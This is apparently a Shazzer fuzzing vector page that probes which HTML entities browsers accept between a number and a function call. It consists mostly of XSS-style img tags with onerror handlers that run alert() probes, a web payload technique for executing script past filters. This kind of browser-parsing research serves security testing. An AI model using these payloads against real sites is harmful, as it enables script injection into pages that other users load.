18
18
18
18This vector uses Shazzer's new features to check which entities are allowed between a function call and number using images. The results are a bit inconsistent yet because I currently wait for page load.
<img src=data: onerror="1$[data1]log('html($[data1])')"><img src=data: onerror="1&alert('&amp;')"><img src=data: onerror="1&alert('&AMP;')"><img src=data: onerror="1*alert('&ast;')"><img src=data: onerror="1,alert('&comma;')"><img src=data: onerror="1>alert('&gt;')"><img src=data: onerror="1>alert('&GT;')"><img src=data: onerror="1^alert('&Hat;')"><img src=data: onerror="1<alert('&lt;')"><img src=data: onerror="1<alert('&LT;')"><img src=data: onerror="1*alert('&midast;')"><img src=data: onerror="1
alert('&NewLine;')"><img src=data: onerror="1%alert('&percnt;')"><img src=data: onerror="1+alert('&plus;')"><img src=data: onerror="1;alert('&semi;')"><img src=data: onerror="1/alert('&sol;')"><img src=data: onerror="1|alert('&verbar;')"><img src=data: onerror="1|alert('&vert;')"><img src=data: onerror="1|alert('&VerticalLine;')">